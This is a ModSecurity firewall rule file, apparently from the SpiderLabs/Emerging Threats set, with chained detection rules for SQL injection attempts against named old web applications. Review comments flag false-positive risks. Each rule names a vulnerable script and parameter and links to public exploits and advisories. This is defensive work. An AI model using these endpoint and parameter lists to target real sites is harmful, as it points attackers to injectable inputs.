# Variant without a TX lookup: link 2 applies the regex (?i:UPDATE.+SET)
# directly to QUERY_STRING and REQUEST_BODY, i.e. "UPDATE", at least one
# character, then "SET", case-insensitively.
# NOTE(review): the regex has no word boundaries, so ordinary text such as
# "updates ... settings" satisfies it and earns the critical score on any
# request whose request line contains "/badword.asp".
# NOTE(review): link 2 lists no t: actions of its own; whether the decoding
# applied in link 1 (or a SecDefaultAction default) also applies to it is not
# visible here. Confirm that QUERY_STRING is decoded before this match.
# NOTE(review): REQUEST_BODY is presumably only populated when request-body
# inspection is enabled for the request - confirm.
SecRule REQUEST_LINE "@contains /badword.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005008,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Ublog Reload SQL Injection Attempt -- badword.asp UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22382'"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Ublog Reload SQL Injection Attempt -- badword.asp UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2007204) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Ultimate Survey Pro SQL Injection Attempt -- index.asp cat UPDATE
# Two-link pattern keyed on the generic path "/index.asp" and a TX name
# matching /SQL_INJECTION.*ARGS:cat/.
# NOTE(review): "/index.asp" is not specific to one product, and the regex
# also matches names that start with "cat". Treat the product name in msg as
# a hint when triaging, not as attribution.
SecRule REQUEST_LINE "@contains /index.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007204,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Ultimate Survey Pro SQL Injection Attempt -- index.asp cat UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/452554/100/0/threaded'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:cat/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Ultimate Survey Pro SQL Injection Attempt -- index.asp cat UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2007210) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Ultimate Survey Pro SQL Injection Attempt -- index.asp did UPDATE
# Sibling of 2007204 for the "did" parameter. Both rules share link 1, so a
# request that satisfies both TX lookups is scored by each rule.
SecRule REQUEST_LINE "@contains /index.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007210,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Ultimate Survey Pro SQL Injection Attempt -- index.asp did UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/452554/100/0/threaded'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:did/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Ultimate Survey Pro SQL Injection Attempt -- index.asp did UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2005674) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS VP-ASP Shopping Cart SQL Injection Attempt -- shopgiftregsearch.asp LoginLastname UPDATE
SecRule REQUEST_LINE
"@contains /shopgiftregsearch.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005674,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS VP-ASP Shopping Cart SQL Injection Attempt -- shopgiftregsearch.asp LoginLastname UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3115'" SecRule &TX:'/SQL_INJECTION.*ARGS:LoginLastname/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS VP-ASP Shopping Cart SQL Injection Attempt -- shopgiftregsearch.asp LoginLastname UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006608) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Vt-Forum Lite SQL Injection Attempt -- vf_memberdetail.asp user UPDATE SecRule REQUEST_LINE "@contains /vf_memberdetail.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006608,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Vt-Forum Lite SQL Injection Attempt -- vf_memberdetail.asp user UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/4850'" SecRule &TX:'/SQL_INJECTION.*ARGS:user/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Vt-Forum Lite SQL Injection Attempt -- vf_memberdetail.asp user UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006284) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS VerliAdmin SQL Injection Attempt -- repass.php nick_mod UPDATE SecRule REQUEST_LINE "@contains /repass.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006284,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS VerliAdmin SQL Injection Attempt -- repass.php nick_mod 
UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/5059'" SecRule &TX:'/SQL_INJECTION.*ARGS:nick_mod/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS VerliAdmin SQL Injection Attempt -- repass.php nick_mod UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006290) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS VerliAdmin SQL Injection Attempt -- repass.php nick UPDATE SecRule REQUEST_LINE "@contains /repass.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006290,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS VerliAdmin SQL Injection Attempt -- repass.php nick UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/5059'" SecRule &TX:'/SQL_INJECTION.*ARGS:nick/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS VerliAdmin SQL Injection Attempt -- repass.php nick UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006296) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS VerliAdmin SQL Injection Attempt -- verify.php nick UPDATE SecRule REQUEST_LINE "@contains /verify.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006296,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS VerliAdmin SQL Injection Attempt -- verify.php nick UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/5059'" SecRule &TX:'/SQL_INJECTION.*ARGS:nick/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS VerliAdmin SQL Injection Attempt -- verify.php nick UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # 
(2006302) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS VerliAdmin SQL Injection Attempt -- verify.php nick_mod UPDATE SecRule REQUEST_LINE "@contains /verify.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006302,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS VerliAdmin SQL Injection Attempt -- verify.php nick_mod UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/5059'" SecRule &TX:'/SQL_INJECTION.*ARGS:nick_mod/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS VerliAdmin SQL Injection Attempt -- verify.php nick_mod UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005498) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Virtuemart SQL Injection Attempt -- virtuemart_parser.php Itemid UPDATE SecRule REQUEST_LINE "@contains /virtuemart_parser.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005498,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Virtuemart SQL Injection Attempt -- virtuemart_parser.php Itemid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22123'" SecRule &TX:'/SQL_INJECTION.*ARGS:Itemid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Virtuemart SQL Injection Attempt -- virtuemart_parser.php Itemid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005504) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Virtuemart SQL Injection Attempt -- virtuemart_parser.php product_id UPDATE SecRule REQUEST_LINE "@contains /virtuemart_parser.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005504,rev:5,msg:'SLR: ET 
WEB_SPECIFIC_APPS Virtuemart SQL Injection Attempt -- virtuemart_parser.php product_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22123'" SecRule &TX:'/SQL_INJECTION.*ARGS:product_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Virtuemart SQL Injection Attempt -- virtuemart_parser.php product_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005510) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Virtuemart SQL Injection Attempt -- virtuemart_parser.php category_id UPDATE SecRule REQUEST_LINE "@contains /virtuemart_parser.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005510,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Virtuemart SQL Injection Attempt -- virtuemart_parser.php category_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22123'" SecRule &TX:'/SQL_INJECTION.*ARGS:category_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Virtuemart SQL Injection Attempt -- virtuemart_parser.php category_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003998) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Vizayn Urun Tanitim Sitesi SQL Injection Attempt -- default.asp id UPDATE SecRule REQUEST_LINE "@contains /default.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003998,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Vizayn Urun Tanitim Sitesi SQL Injection Attempt -- default.asp id UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/25348'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Vizayn Urun Tanitim Sitesi SQL 
Injection Attempt -- default.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005894) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Vizayn Haber SQL Injection Attempt -- haberdetay.asp id UPDATE SecRule REQUEST_LINE "@contains /haberdetay.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005894,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Vizayn Haber SQL Injection Attempt -- haberdetay.asp id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3061'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Vizayn Haber SQL Injection Attempt -- haberdetay.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007421) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS vSpin.net Classified System SQL Injection Attempt -- cat.asp cat UPDATE SecRule REQUEST_LINE "@contains /cat.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007421,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS vSpin.net Classified System SQL Injection Attempt -- cat.asp cat UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21190'" SecRule &TX:'/SQL_INJECTION.*ARGS:cat/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS vSpin.net Classified System SQL Injection Attempt -- cat.asp cat UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007427) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS vSpin.net Classified System SQL Injection Attempt -- search.asp keyword UPDATE SecRule REQUEST_LINE "@contains /search.asp" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007427,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS vSpin.net Classified System SQL Injection Attempt -- search.asp keyword UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21190'" SecRule &TX:'/SQL_INJECTION.*ARGS:keyword/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS vSpin.net Classified System SQL Injection Attempt -- search.asp keyword UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007433) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS vSpin.net Classified System SQL Injection Attempt -- search.asp order UPDATE SecRule REQUEST_LINE "@contains /search.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007433,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS vSpin.net Classified System SQL Injection Attempt -- search.asp order UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21190'" SecRule &TX:'/SQL_INJECTION.*ARGS:order/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS vSpin.net Classified System SQL Injection Attempt -- search.asp order UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007439) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS vSpin.net Classified System SQL Injection Attempt -- search.asp sort UPDATE SecRule REQUEST_LINE "@contains /search.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007439,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS vSpin.net Classified System SQL Injection Attempt -- search.asp sort UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21190'" 
SecRule &TX:'/SQL_INJECTION.*ARGS:sort/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS vSpin.net Classified System SQL Injection Attempt -- search.asp sort UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007445) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS vSpin.net Classified System SQL Injection Attempt -- search.asp menuSelect UPDATE SecRule REQUEST_LINE "@contains /search.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007445,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS vSpin.net Classified System SQL Injection Attempt -- search.asp menuSelect UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21190'" SecRule &TX:'/SQL_INJECTION.*ARGS:menuSelect/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS vSpin.net Classified System SQL Injection Attempt -- search.asp menuSelect UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007451) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS vSpin.net Classified System SQL Injection Attempt -- search.asp state UPDATE SecRule REQUEST_LINE "@contains /search.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007451,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS vSpin.net Classified System SQL Injection Attempt -- search.asp state UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21190'" SecRule &TX:'/SQL_INJECTION.*ARGS:state/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS vSpin.net Classified System SQL Injection Attempt -- search.asp state 
UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004133) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_forum UPDATE SecRule REQUEST_LINE "@contains /search.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004133,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_forum UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23057'" SecRule &TX:'/SQL_INJECTION.*ARGS:search_forum/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_forum UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004139) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_user UPDATE SecRule REQUEST_LINE "@contains /search.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004139,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_user UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23057'" SecRule &TX:'/SQL_INJECTION.*ARGS:search_user/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_user UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004652) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS W1L3D4 WEBmarket SQL Injection Attempt -- urunbak.asp id UPDATE SecRule REQUEST_LINE "@contains /urunbak.asp" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004652,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS W1L3D4 WEBmarket SQL Injection Attempt -- urunbak.asp id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24364'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS W1L3D4 WEBmarket SQL Injection Attempt -- urunbak.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005309) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS W2B Online Banking SQL Injection Attempt -- mailer.w2b draft UPDATE SecRule REQUEST_LINE "@contains /mailer.w2b" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005309,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS W2B Online Banking SQL Injection Attempt -- mailer.w2b draft UPDATE',tag:'web-application-attack',tag:'cve,CVE-2007-3175'" SecRule &TX:'/SQL_INJECTION.*ARGS:draft/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS W2B Online Banking SQL Injection Attempt -- mailer.w2b draft UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005191) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS W2B Online Banking SQL Injection Attempt -- DocPay.w2b listDocPay UPDATE SecRule REQUEST_LINE "@contains /DocPay.w2b" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005191,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS W2B Online Banking SQL Injection Attempt -- DocPay.w2b listDocPay UPDATE',tag:'web-application-attack',tag:'cve,CVE-2007-3175'" SecRule &TX:'/SQL_INJECTION.*ARGS:listDocPay/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET 
WEB_SPECIFIC_APPS W2B Online Banking SQL Injection Attempt -- DocPay.w2b listDocPay UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004317) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WBBlog SQL Injection Attempt -- index.php e_id UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004317,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WBBlog SQL Injection Attempt -- index.php e_id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3490'" SecRule &TX:'/SQL_INJECTION.*ARGS:e_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WBBlog SQL Injection Attempt -- index.php e_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005954) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Website Designs For Less Click N Print Coupons SQL Injection Attempt -- coupon_detail.asp key UPDATE SecRule REQUEST_LINE "@contains /coupon_detail.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005954,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Website Designs For Less Click N Print Coupons SQL Injection Attempt -- coupon_detail.asp key UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21824'" SecRule &TX:'/SQL_INJECTION.*ARGS:key/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Website Designs For Less Click N Print Coupons SQL Injection Attempt -- coupon_detail.asp key UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003769) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WF-Links (wflinks) 
SQL Injection Attempt -- viewcat.php cid UPDATE SecRule REQUEST_LINE "@contains /viewcat.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003769,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WF-Links (wflinks) SQL Injection Attempt -- viewcat.php cid UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3670'" SecRule &TX:'/SQL_INJECTION.*ARGS:cid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WF-Links (wflinks) SQL Injection Attempt -- viewcat.php cid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004258) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WSN Guest SQL Injection Attempt -- comments.php id UPDATE SecRule REQUEST_LINE "@contains /comments.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004258,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WSN Guest SQL Injection Attempt -- comments.php id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3477'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WSN Guest SQL Injection Attempt -- comments.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006460) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WSPortal SQL Injection Attempt -- content.php page UPDATE SecRule REQUEST_LINE "@contains /content.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006460,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WSPortal SQL Injection Attempt -- content.php page UPDATE',tag:'web-application-attack',tag:'url,www.osvdb.org/34164'" SecRule &TX:'/SQL_INJECTION.*ARGS:page/' "@gt 
